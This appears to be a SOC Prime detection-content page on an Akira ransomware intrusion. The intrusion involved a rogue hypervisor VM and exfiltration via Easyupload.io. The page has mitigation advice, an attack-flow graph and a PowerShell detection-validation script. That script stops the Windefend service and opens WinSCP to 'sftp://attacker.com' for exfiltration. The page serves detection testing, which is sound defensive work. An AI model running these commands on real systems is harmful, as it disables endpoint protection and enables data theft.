SOC Prime Bias: High

19 Jun 2026 07:31 UTC
newspaper icon Huntress

Akira, LimeWire, and the Sour Taste of Data Exfiltration

Author Photo
SOC Prime Team linkedin icon Follow
Akira, LimeWire, and the Sour Taste of Data Exfiltration
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

An Akira ransomware affiliate obtained unauthorized access to a hypervisor and created a new virtual machine to use as a covert staging environment. The attacker relied on this isolated VM to avoid security monitoring, prepare data with WinRAR, and exfiltrate archives through the Easyupload.io file-sharing platform. The case demonstrates how threat actors continue to abuse legitimate upload services for data theft.

Investigation

The investigation combined EDR telemetry, Windows Event Logs, and Microsoft Edge browsing history to reconstruct the intrusion. Analysts also recovered a VHDX image of the rogue virtual machine, which revealed the attacker disabling Microsoft Defender and setting up the Akira ransomware operation. Forensic review of the VM exposed the exact tools, websites, and workflow used during the staging and exfiltration phases.

Mitigation

Organizations should monitor for the appearance of new or unauthorized endpoints and virtual machine instances across their environment. Strong visibility into remote access to critical systems such as hypervisors and domain controllers is essential. It is also important to restrict or closely monitor access to known file-sharing and rapid-upload services that can be used for exfiltration.

Response

If unauthorized hypervisor access is identified, immediately isolate the affected hypervisor and any newly created virtual machines. Perform forensic analysis of the VM disk images to determine the extent of data staging and exfiltration. Review access logs to trace the original entry point and confirm that no persistent attacker access remains.

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Initial Access Phase action_access["<b>Action</b> – <b>T1563.002 & T1021</b><br/>Unauthorized access via Remote Services<br/>and Session Hijacking targeting<br/>Domain Controller and Hypervisor."] class action_access action %% Reconnaissance Phase action_recon_ad["<b>Action</b> – <b>T1087 & T1681</b><br/>Reconnaissance by enumerating<br/>Active Directory users and computers."] class action_recon_ad action action_recon_soft["<b>Action</b> – <b>T1592.002</b><br/>Information discovery regarding<br/>host software."] class action_recon_soft action %% Defense Evasion and Staging action_hide_artifact["<b>Action</b> – <b>T1564.006</b><br/>Hide Artifacts by running a new<br/>virtual instance on the hypervisor<br/>to bypass security agents."] class action_hide_artifact action action_disable_defender["<b>Action</b> – <b>T1685</b><br/>Defense Impairment by disabling<br/>Microsoft Defender on the new VM."] class action_disable_defender defense %% Lateral Movement and Data Collection action_lateral_move["<b>Action</b> – <b>T1080</b><br/>Lateral Movement to the<br/>organization file server."] class action_lateral_move action tool_winrar["<b>Tool</b> – <b>Name</b>: WinRAR<br/><b>Description</b>: Used for archiving<br/>sensitive files within share folders."] class tool_winrar tool action_collect_data["<b>Action</b> – <b>T1560</b><br/>Data Collection by archiving<br/>sensitive files."] class action_collect_data action %% Exfiltration Phase action_stage_data["<b>Action</b> – <b>T1074.002</b><br/>Data Staging of archives<br/>prior to exfiltration."] class action_stage_data action action_move_tools["<b>Action</b> – <b>T1570</b><br/>Ingress Tool Transfer to move<br/>attack tools into the environment."] class action_move_tools action tool_winscp["<b>Tool</b> – <b>Name</b>: WinSCP<br/><b>Description</b>: Used for data transfer."] class tool_winscp tool tool_easyupload["<b>Tool</b> – <b>Name</b>: Easyupload.io / LimeWire<br/><b>Description</b>: Web-based file transfer<br/>service used for exfiltration."] class tool_easyupload tool action_exfiltrate["<b>Action</b> – <b>T1071.002 & T1105</b><br/>Exfiltration via web-based service<br/>and file transfer protocols."] class action_exfiltrate action %% Impact Phase malware_akira["<b>Malware</b> – <b>Name</b>: Akira ransomware<br/><b>File</b>: akira.exe<br/><b>Description</b>: Encrypts files on<br/>mounted network shares."] class malware_akira malware action_impact["<b>Action</b> – <b>T1486</b><br/>Impact via data encryption."] class action_impact action %% Connections action_access –>|leads_to| action_recon_ad action_access –>|leads_to| action_recon_soft action_recon_ad –>|leads_to| action_hide_artifact action_recon_soft –>|leads_to| action_hide_artifact action_hide_artifact –>|leads_to| action_disable_defender action_disable_defender –>|leads_to| action_lateral_move action_lateral_move –>|leads_to| action_collect_data action_collect_data –>|uses| tool_winrar action_collect_data –>|leads_to| action_stage_data action_stage_data –>|leads_to| action_move_tools action_move_tools –>|leads_to| action_exfiltrate action_exfiltrate –>|uses| tool_winscp action_exfiltrate –>|uses| tool_easyupload action_exfiltrate –>|leads_to| malware_akira malware_akira –>|results_in| action_impact "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has gained initial access and is looking to escalate the impact. They first enumerate sensitive files by checking for known text files like AdUsers.txt. To prepare for exfiltration, they use WinRAR.exe to compress the data. They then prepare their exfiltration tool, WinSCP.exe, and finally execute the akira.exe ransomware payload. To prevent the EDR/Antivirus from killing the process, they attempt to stop the Windefend service. This specific sequence of command-line arguments and service status changes is intended to trigger the Akira-specific detection logic.

  • Regression Test Script:

    # Simulation Script for Akira Ransomware Detection Validation
# NOTE: This script requires administrative privileges to stop the Defender service.

Write-Host "[+] Starting Akira Ransomware Simulation..." -ForegroundColor Cyan

# 1. Simulate Discovery/Enumeration (T1119)
Write-Host "[+] Step 1: Simulating file enumeration via Notepad..."
Start-Process notepad.exe -ArgumentList "AdUsers.txt"
Start-Sleep -Seconds 2

# 2. Simulate Data Archiving (T1560.003)
# Note: We assume WinRAR is present or we simulate the command line activity
Write-Host "[+] Step 2: Simulating data archival with WinRAR..."
Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
Start-Sleep -Seconds 2

# 3. Simulate Exfiltration Tool Prep (T1105)
Write-Host "[+] Step 3: Simulating exfiltration tool execution..."
Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
Start-Sleep -Seconds 2

# 4. Simulate Ransomware Execution (T1204.002)
Write-Host "[+] Step 4: Simulating Akira payload execution..."
Start-Process "akira.exe"
Start-Sleep -Seconds 2

# 5. Simulate Disabling Defender (T1564.006)
# This triggers EventID 7036 in the System Log
Write-Host "[+] Step 5: Attempting to stop Microsoft Defender..."
Stop-Service -Name "Windefend" -Force

Write-Host "[+] Simulation Complete. Check SIEM for alerts." -ForegroundColor Green

  • Cleanup Commands:

    # Cleanup Script
Write-Host "[+] Cleaning up simulation artifacts..." -ForegroundColor Cyan

# Restart Defender Service
Start-Service -Name "Windefend"

# Remove simulated files
Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue

Write-Host "[+] Cleanup complete." -ForegroundColor Green

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free